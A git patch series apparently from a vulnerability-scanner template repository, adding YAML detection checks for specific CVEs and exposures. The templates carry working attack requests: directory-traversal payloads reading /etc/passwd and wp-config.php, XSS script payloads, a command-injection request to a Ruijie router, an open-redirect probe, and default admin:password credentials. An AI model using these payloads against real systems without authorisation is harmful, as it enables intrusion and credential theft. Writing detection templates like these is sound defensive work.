Wed, 4 Aug 2021 22:04:06 +0530 Subject: [PATCH 1437/4083] Update and rename default-logins/Tieline/Tieline.yaml to default-logins/tieline/tieline.yaml --- .../{Tieline/Tieline.yaml => tieline/tieline.yaml} | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) rename default-logins/{Tieline/Tieline.yaml => tieline/tieline.yaml} (82%) diff --git a/default-logins/Tieline/Tieline.yaml b/default-logins/tieline/tieline.yaml similarity index 82% rename from default-logins/Tieline/Tieline.yaml rename to default-logins/tieline/tieline.yaml index e774acdba7..e449fcaa04 100644 --- a/default-logins/Tieline/Tieline.yaml +++ b/default-logins/tieline/tieline.yaml @@ -1,12 +1,12 @@ -id: Tieline-default-credentials +id: tieline-default-credentials info: - name: Tieline Default Credentials Detection Template + name: Tieline Default Credentials author: Pratik Khalane severity: high - description: Finding the Tieline Admin Panels with default credentials. + description: Finding the Tieline Admin Panels with default credentials. reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c - tags: Tieline,default-login + tags: tieline,default-login #Payloads: @@ -37,4 +37,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 878508b887c9519dfa3f5d2548eed869a4be08ce Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 4 Aug 2021 22:05:51 +0530 Subject: [PATCH 1438/4083] Update tieline.yaml --- default-logins/tieline/tieline.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/default-logins/tieline/tieline.yaml b/default-logins/tieline/tieline.yaml index e449fcaa04..47d654b01c 100644 --- a/default-logins/tieline/tieline.yaml +++ b/default-logins/tieline/tieline.yaml @@ -9,7 +9,6 @@ info: tags: tieline,default-login #Payloads: - #Username - admin #Password - password From cb0483267a11903569431da0f9fd148052fbb18b Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 5 Aug 2021 01:32:11 +0900 Subject: [PATCH 1439/4083] Create qdpm-info-leak.yaml The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/qdpm-info-leak.yaml | 30 +++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/other/qdpm-info-leak.yaml diff --git a/vulnerabilities/other/qdpm-info-leak.yaml b/vulnerabilities/other/qdpm-info-leak.yaml new file mode 100644 index 0000000000..574165a4e2 --- /dev/null +++ b/vulnerabilities/other/qdpm-info-leak.yaml @@ -0,0 +1,30 @@ +id: qdpm-info-leak + +info: + author: gy741 + description: The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download. + name: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) + severity: high + tags: qdpm,exposure + reference: | + - https://www.exploit-db.com/exploits/50176 + +requests: + - method: GET + path: + - '{{BaseURL}}/core/config/databases.yml' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'dsn:' + - 'profiler:' + - 'username:' + - 'password:' + condition: and + + - type: status + status: + - 200 From 255fe969b5f4d62c2df29833498c91a0a21cb9e8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 4 Aug 2021 22:11:10 +0530 Subject: [PATCH 1440/4083] Update tieline.yaml --- default-logins/tieline/tieline.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/tieline/tieline.yaml b/default-logins/tieline/tieline.yaml index 47d654b01c..eeeb63140b 100644 --- a/default-logins/tieline/tieline.yaml +++ b/default-logins/tieline/tieline.yaml @@ -20,7 +20,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Referer: '{{BaseURL}}/assets/base/home.html' Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"' - + matchers-condition: and matchers: - type: word From d669c81dcdbe28b70cb12dbf5bc6f5e33214abe1 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 4 Aug 2021 19:17:11 -0500 Subject: [PATCH 1441/4083] Create perl-scanner.yaml --- file/perl/perl-scanner.yaml | 107 ++++++++++++++++++++++++++++++++++++ 1 file changed, 107 insertions(+) create mode 100644 file/perl/perl-scanner.yaml diff --git a/file/perl/perl-scanner.yaml b/file/perl/perl-scanner.yaml new file mode 100644 index 0000000000..d74c3647f4 --- /dev/null +++ b/file/perl/perl-scanner.yaml @@ -0,0 +1,107 @@ +id: perl-scanner + +info: + name: Perl File Scanner + author: geeknik + severity: info + tags: perl,file + +file: + - extensions: + - pl # default + - perl # uncommon + - pod # plain old documentation + - pm # perl module + + extractors: + - type: regex + # Standard random number generators should not be used to generate randomness used for security reasons. For security sensitive randomness a crytographic randomness generator that provides sufficient entropy should be used. + regex: + - 'srand' + - 'rand' + condition: or + - type: regex + regex: + - 'getc' + - 'readdir' + - 'read' + - 'sysread' + condition: or + - type: regex + # When using exec, it is important to be sure that the string being used does not contain relative paths elements (../ for example), or a null, which may cause underlying C calls to behave strangely. + regex: + - 'exec' + - type: regex + # The filehandle argument should not be derived from user input. Doing so could allow arbitrary filehandles to have operations carried out on them. + regex: + - 'fcntl' + - type: regex + # The second argument specifiying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to be bound to an address of their choice. + regex: + - 'bind' + - type: regex + # When using setpgrp, neither argument should be derived from user input, doing so may allow the attacker to modify both the PID and the PGRP argument, possibly allowing arbitrary processes to have their process group changed. + regex: + - 'setpgrp' + - type: regex + # When using setpriority, do not pass arguments to it that are derived from user input. Doing so could allow an attacker to set the priority of an arbitrary process on the system. + regex: + - 'setpriority' + - type: regex + # Care should be exercised when using the syscall function. Arguments derived from user input are to be avoided, and are especially dangerous due to the fact they are passed directly to the underlying OS call. There is also a potential for buffer-overflow like problems with strings that may be written to. Extend all perl strings to sane lengths before passing them into this function. + regex: + - 'syscall' + - type: regex + # The second argument specifiying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to connect to an arbitrary remote address, enabling hijacking of potentially sensitive network data. + regex: + - 'connect' + - type: regex + # When using system, it is important to be sure that the string being used does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave strangely. It is also imperative to insure the string has no characters that may be interpreted by the shell, possibly allowing arbitrary commands to be run. + regex: + - 'system' + - type: regex + # The filename argument of open should be carefully checked if it is being created with any user-supplied string as a compontent of it. Strings should be checked for occurences of path backtracking/relative path components (../ as an example), or nulls, which may cause the underlying C call to interpret the filename to open differently than expected. It is also important to make sure that the final filename does not end in a "|", as this will cause the path to be executed. + regex: + - 'open' + - type: regex + # When using this function, it is important to be sure that the string being passed in does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave in ways you do not expect. This is especially important if the string is in any way constructed from a user supplied value. + regex: + - 'mkdir' + - 'chdir' + - 'rmdir' + - 'chown' + - 'chmod' + - 'link' + - 'symlink' + - 'truncate' + - 'chroot' + - type: regex + # Using a user supplied expression as an argument to this function should be avoided. Explicitly set the umask to a value you know is safe. + regex: + - 'umask' + - type: regex + # Avoid constructing the list of process ids to kill with any strings that contain user inputted data. Users may be able to manipulate the pid values in such a way as to cause arbitrary signals to be sent to processes, possibly leading to exploits or DoS attacks. + regex: + - 'kill' + - type: regex + # Using user supplied strings as the arguments to ioctl may allow the user to manipulate the device in arbitrary ways. + regex: + - 'ioctl' + - type: regex + # Using user supplied strings anywhere inside of an eval is extremely dangerous. Unvalidated user input fed into an eval call may allow the user to execute arbitrary perl code. Avoid ever passing user supplied strings into eval. + regex: + - 'eval' + - type: regex + # Glob invokes a shell (usually /bin/csh) to obtain the list of filenames that match the glob pattern. Unvalidated user input used in a glob pattern could allow arbitrary shell code to be run, possibly executing programs as a result. Avoid using user input in glob patterns. + regex: + - 'glob' + - type: regex + # Remember that sensitive data get copied on fork. For example, a random number generator's internal state will get duplicated, and the child may start outputting identical number streams. + regex: + - 'fork' + - type: regex + # DNS results can easily be forged by an attacker (or arbitrarily set to large values, etc), and should not be trusted. + regex: + - 'gethostbyname' + - 'gethostbyaddr' + condition: or From 76a82eba557cb1218a3a22104d0e95b9cd91add8 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 4 Aug 2021 19:18:37 -0500 Subject: [PATCH 1442/4083] Create php-scanner.yaml --- file/php/php-scanner.yaml | 126 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 126 insertions(+) create mode 100644 file/php/php-scanner.yaml diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml new file mode 100644 index 0000000000..59de13dc1e --- /dev/null +++ b/file/php/php-scanner.yaml @@ -0,0 +1,126 @@ +id: php-scanner + +info: + name: PHP Scanner + author: geeknik + severity: info + tags: php,file + +file: + - extensions: + - html + - phtml + - php + - php3 + - php4 + + extractors: + - type: regex + # Investigate for possible SQL Injection + # Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id"); + # Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array(‘$user_id’)); + regex: + - '(?i)getone|getrow|getall|getcol|getassoc|execute|replace' + - type: regex + # Warn when var_dump is found + regex: + - 'var_dump' + - type: regex + # Warn when display_errors is enabled manually + regex: + - 'display_errors' + - type: regex + # Avoid the use of eval() + regex: + - 'eval' + - 'eval\((base64|eval|\$_|\$\$|\$[A-Za-z_0-9\{]*(\(|\{|\[))' + condition: or + - type: regex + # Avoid the use of exit or die() + regex: + - 'exit' + - 'die' + condition: or + - type: regex + # Avoid the use of logical operators (ex. using and over &&) + regex: + - 'and' + - type: regex + # Avoid the use of the ereg* functions (now deprecated) + regex: + - 'ereg' + - type: regex + # Ensure that the second parameter of extract is set to not overwrite (not EXTR_OVERWRITE) + regex: + - 'extract' + - type: regex + # Checking output methods (echo, print, printf, print_r, vprintf, sprintf) that use variables in their options + regex: + - 'echo' + - 'print' + - 'printf' + - 'print_r' + - 'vprintf' + - 'sprintf' + condition: or + - type: regex + # Ensuring you're not using echo with file_get_contents + regex: + - 'file_get_contents' + - type: regex + # Testing for the system execution functions and shell exec (backticks) + regex: + - '\\`' + - type: regex + # Use of readfile, readlink and readgzfile + regex: + - 'readfile' + - 'readlink' + - 'readgzfile' + - type: regex + # Using parse_str or mb_parse_str (writes values to the local scope) + regex: + - 'parse_st' + - 'mb_parse_str' + - type: regex + # Using session_regenerate_id either without a parameter or using false + regex: + - 'session_regenerate' + - type: regex + # Avoid use of $_REQUEST (know where your data is coming from) + regex: + - '\\$_REQUEST' + - type: regex + # Don't use mysql_real_escape_string + regex: + - 'mysql_real_escape_string' + - type: regex + # Avoiding use of import_request_variables + regex: + - 'import_request_variables' + - type: regex + # Avoid use of $GLOBALS + regex: + - '\\$GLOBALS' + - type: regex + regex: + - '\\$_GET' + - type: regex + regex: + - '\\$_POST' + - type: regex + # Ensure the use of type checking validating against booleans (===) + regex: + - '\\=\\=\\=' + - type: regex + # Ensure that the /e modifier isn't used in regular expressions (execute) + regex: + - '\\/e' + - type: regex + # Using concatenation in header() calls + regex: + - 'header' + - type: regex + # Avoiding the use of $http_raw_post_data + regex: + - '\\$http_raw_post_data' From 9feedb27afa36ac840f681358d5200b6df62d844 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 5 Aug 2021 08:36:32 +0700 Subject: [PATCH 1443/4083] Create CVE-2010-4617.yaml --- cves/2010/CVE-2010-4617.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-4617.yaml diff --git a/cves/2010/CVE-2010-4617.yaml b/cves/2010/CVE-2010-4617.yaml new file mode 100644 index 0000000000..39c726a67f --- /dev/null +++ b/cves/2010/CVE-2010-4617.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4617 + +info: + name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/15791 + - https://www.cvedetails.com/cve/CVE-2010-4617 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 9ff949334141c067ba12798979a6cfef99a86ac7 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 5 Aug 2021 12:48:55 +0700 Subject: [PATCH 1444/4083] Create CVE-2017-18024.yaml --- cves/2017/CVE-2017-18024.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2017/CVE-2017-18024.yaml diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml new file mode 100644 index 0000000000..6c6f049add --- /dev/null +++ b/cves/2017/CVE-2017-18024.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-18024 + +info: + name: AvantFAX 3.3.3 XSS + author: pikpikcu + severity: medium + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2017-18024 + - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html + - https://hackerone.com/reports/963798 + description: | + AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. + tags: cve,cve2017,xss,avantfax + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Content-Length: 44 + + username=admin&password=admin&_submit_check=1&jlbqg%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eb7g0x=1 + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" From f210898a563a9e53b8be4ca1cfa28972c11391a7 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 5 Aug 2021 12:51:43 +0700 Subject: [PATCH 1445/4083] Create avantfax-detect.yaml --- technologies/avantfax-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/avantfax-detect.yaml diff --git a/technologies/avantfax-detect.yaml b/technologies/avantfax-detect.yaml new file mode 100644 index 0000000000..3064efa0da --- /dev/null +++ b/technologies/avantfax-detect.yaml @@ -0,0 +1,24 @@ +id: avantfax-detect + +info: + name: AvantFAX Detect + author: pikpikcu + severity: info + tags: tech,avantfax + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "- AvantFAX - Login" + + - type: status + status: + - 200 From 34f905286a0760faa87b3303da89c79f15c961d9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 5 Aug 2021 12:52:50 +0530 Subject: [PATCH 1446/4083] moving files around --- .../2021/CVE-2021–35336.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename default-logins/tieline/tieline.yaml => cves/2021/CVE-2021–35336.yaml (69%) diff --git a/default-logins/tieline/tieline.yaml b/cves/2021/CVE-2021–35336.yaml similarity index 69% rename from default-logins/tieline/tieline.yaml rename to cves/2021/CVE-2021–35336.yaml index eeeb63140b..3d974df91c 100644 --- a/default-logins/tieline/tieline.yaml +++ b/cves/2021/CVE-2021–35336.yaml @@ -1,16 +1,16 @@ -id: tieline-default-credentials +id: CVE-2021–35336 info: - name: Tieline Default Credentials + name: Unauthorised Remote Access of Internal Panel author: Pratik Khalane - severity: high + severity: critical description: Finding the Tieline Admin Panels with default credentials. - reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c - tags: tieline,default-login + reference: | + - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c + - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 + tags: cve,cve2021,tieline,default-login -#Payloads: -#Username - admin -#Password - password +# admin:password requests: - method: GET From dbab8fb57a7cc746ddf4cdd40cb61938606da89d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 5 Aug 2021 15:25:08 +0530 Subject: [PATCH 1447/4083] Create office365-open-redirect.yaml --- misconfiguration/office365-open-redirect.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 misconfiguration/office365-open-redirect.yaml diff --git a/misconfiguration/office365-open-redirect.yaml b/misconfiguration/office365-open-redirect.yaml new file mode 100644 index 0000000000..973d050ae8 --- /dev/null +++ b/misconfiguration/office365-open-redirect.yaml @@ -0,0 +1,20 @@ +id: office365-open-redirect + +info: + name: Office365 Open Redirect From Autodiscover + author: dhiyaneshDk + severity: low + reference: https://medium.com/@heinjame/office365-open-redirect-from-autodiscover-64284d26c168 + tags: redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/anyname@attacker.com?Protocol=Autodiscoverv1" + + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - "Attacker" From 8e0a730e3d52cf0fa61d58b9b3a383f3efeb8bc7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 5 Aug 2021 16:10:17 +0530 Subject: [PATCH 1448/4083] Rename vulnerabilities/other/qdpm-info-leak.yaml to exposures/configs/qdpm-info-leak.yaml --- {vulnerabilities/other => exposures/configs}/qdpm-info-leak.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {vulnerabilities/other => exposures/configs}/qdpm-info-leak.yaml (100%) diff --git a/vulnerabilities/other/qdpm-info-leak.yaml b/exposures/configs/qdpm-info-leak.yaml similarity index 100% rename from vulnerabilities/other/qdpm-info-leak.yaml rename to exposures/configs/qdpm-info-leak.yaml From 24efdfd6782e4a2f8be29d15a72d4c0defc9be12 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 5 Aug 2021 16:17:30 +0530 Subject: [PATCH 1449/4083] Update qdpm-info-leak.yaml --- exposures/configs/qdpm-info-leak.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/configs/qdpm-info-leak.yaml b/exposures/configs/qdpm-info-leak.yaml index 574165a4e2..2d3ffedf3c 100644 --- a/exposures/configs/qdpm-info-leak.yaml +++ b/exposures/configs/qdpm-info-leak.yaml @@ -20,7 +20,6 @@ requests: part: body words: - 'dsn:' - - 'profiler:' - 'username:' - 'password:' condition: and From 1140b9117a138f08a07fbed76f2399b17eafa982 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 5 Aug 2021 16:29:52 +0530 Subject: [PATCH 1450/4083] updated matchers --- misconfiguration/office365-open-redirect.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/misconfiguration/office365-open-redirect.yaml b/misconfiguration/office365-open-redirect.yaml index 973d050ae8..fbc48034dd 100644 --- a/misconfiguration/office365-open-redirect.yaml +++ b/misconfiguration/office365-open-redirect.yaml @@ -5,16 +5,20 @@ info: author: dhiyaneshDk severity: low reference: https://medium.com/@heinjame/office365-open-redirect-from-autodiscover-64284d26c168 - tags: redirect + tags: redirect,office365,microsoft requests: - method: GET path: - - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/anyname@attacker.com?Protocol=Autodiscoverv1" + - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/{{randstr}}@interact.sh?Protocol=Autodiscoverv1" - redirects: true - max-redirects: 2 + matchers-condition: and matchers: - type: word + part: header words: - - "Attacker" + - "https://autodiscover.interact.sh" + + - type: status + status: + - 302 From b20ba6754da1f279712b979dfef5b6eee2db5faf Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 5 Aug 2021 16:31:01 +0530 Subject: [PATCH 1451/4083] minor update --- misconfiguration/office365-open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/office365-open-redirect.yaml b/misconfiguration/office365-open-redirect.yaml index fbc48034dd..92989fd195 100644 --- a/misconfiguration/office365-open-redirect.yaml +++ b/misconfiguration/office365-open-redirect.yaml @@ -17,7 +17,7 @@ requests: - type: word part: header words: - - "https://autodiscover.interact.sh" + - "autodiscover.interact.sh" - type: status status: From 08e831bf7dded5b570c7e340c2c6e83b60aef870 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 5 Aug 2021 20:37:59 +0530 Subject: [PATCH 1452/4083] Update avantfax-detect.yaml --- technologies/avantfax-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/technologies/avantfax-detect.yaml b/technologies/avantfax-detect.yaml index 3064efa0da..93d6b9317d 100644 --- a/technologies/avantfax-detect.yaml +++ b/technologies/avantfax-detect.yaml @@ -22,3 +22,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '

    ([0-9.]+)<\/p>' From f63f7af8aa53f0471eaec337ce6f9b1337a41a03 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 5 Aug 2021 20:40:16 +0530 Subject: [PATCH 1453/4083] Update CVE-2017-18024.yaml --- cves/2017/CVE-2017-18024.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml index 6c6f049add..b1adfa2dad 100644 --- a/cves/2017/CVE-2017-18024.yaml +++ b/cves/2017/CVE-2017-18024.yaml @@ -5,9 +5,9 @@ info: author: pikpikcu severity: medium reference: | - - https://nvd.nist.gov/vuln/detail/CVE-2017-18024 - - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html - https://hackerone.com/reports/963798 + - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-18024 description: | AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. tags: cve,cve2017,xss,avantfax @@ -20,13 +20,13 @@ requests: Content-Type: application/x-www-form-urlencoded Content-Length: 44 - username=admin&password=admin&_submit_check=1&jlbqg%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eb7g0x=1 + username=admin&password=admin&_submit_check=1&jlbqg%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eb7g0x=1 matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status From 9646633d30ff4700844aea08a793345a233cb179 Mon Sep 17 00:00:00 2001 From: mass0ma Date: Thu, 5 Aug 2021 16:59:36 +0000 Subject: [PATCH 1454/4083] Added CVE-2017-14651 Template --- cves/2017/CVE-2017-14651.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2017/CVE-2017-14651.yaml diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml new file mode 100644 index 0000000000..af3f0c8f82 --- /dev/null +++ b/cves/2017/CVE-2017-14651.yaml @@ -0,0 +1,22 @@ +id: WSO2 XSS +info: + name: WSO2 XSS CVE-2017-14651 + author: mass0ma + severity: medium + tags: WSO2,XSS + +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E" + + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + From 79d29e355b0a08b5d96e3c141b0f1a60dd105139 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 6 Aug 2021 06:06:54 +0700 Subject: [PATCH 1455/4083] Create CVE-2010-2682.yaml --- cves/2010/CVE-2010-2682.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2682.yaml diff --git a/cves/2010/CVE-2010-2682.yaml b/cves/2010/CVE-2010-2682.yaml new file mode 100644 index 0000000000..11ae2576a6 --- /dev/null +++ b/cves/2010/CVE-2010-2682.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2682 + +info: + name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/14017 + - https://www.cvedetails.com/cve/CVE-2010-2682 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 03a67a37381b63ab2881ec9f1e3d19168cc3f717 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 6 Aug 2021 06:09:11 +0700 Subject: [PATCH 1456/4083] Create CVE-2014-5368.yaml --- cves/2014/CVE-2014-5368.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2014/CVE-2014-5368.yaml diff --git a/cves/2014/CVE-2014-5368.yaml b/cves/2014/CVE-2014-5368.yaml new file mode 100644 index 0000000000..9b0bd4e453 --- /dev/null +++ b/cves/2014/CVE-2014-5368.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-5368 + +info: + name: WordPress Plugin WP Content Source Control - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + reference: | + - https://www.exploit-db.com/exploits/39287 + - https://www.cvedetails.com/cve/CVE-2014-5368 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 57624f3d2540b77b7eb21c74ca0462716fcedc32 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 6 Aug 2021 17:04:32 +0700 Subject: [PATCH 1457/4083] Create ruijie-eg-rce.yaml --- vulnerabilities/other/ruijie-eg-rce.yaml | 32 ++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/other/ruijie-eg-rce.yaml diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml new file mode 100644 index 0000000000..8a1aa6f4e4 --- /dev/null +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -0,0 +1,32 @@ +id: ruijie-eg-rce + +info: + name: Ruijie EG cli.php RCE + author: pikpikcu + severity: critical + reference: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + vendor: https://www.ruijienetworks.com + tags: ruijie,rce + +requests: + - raw: + - | + POST /cli.php?a=shell HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + Content-Length: 111 + + notdelay=true&command=cat /etc/passwd + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + - "nobody:x:0:0:" + part: body + + - type: status + status: + - 200 From 5952685f5c09b95c81a44761704059849e8a624f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 6 Aug 2021 17:46:57 +0700 Subject: [PATCH 1458/4083] Create ruijie-nbr1300g-cli-password-leak.yaml --- .../ruijie-nbr1300g-cli-password-leak.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml diff --git a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml new file mode 100644 index 0000000000..e51aea2bef --- /dev/null +++ b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml @@ -0,0 +1,31 @@ +id: ruijie-nbr1300g-cli-password-leak + +info: + name: Ruijie NBR1300G Cli Password Leak + author: pikpikcu + severity: medium + reference: 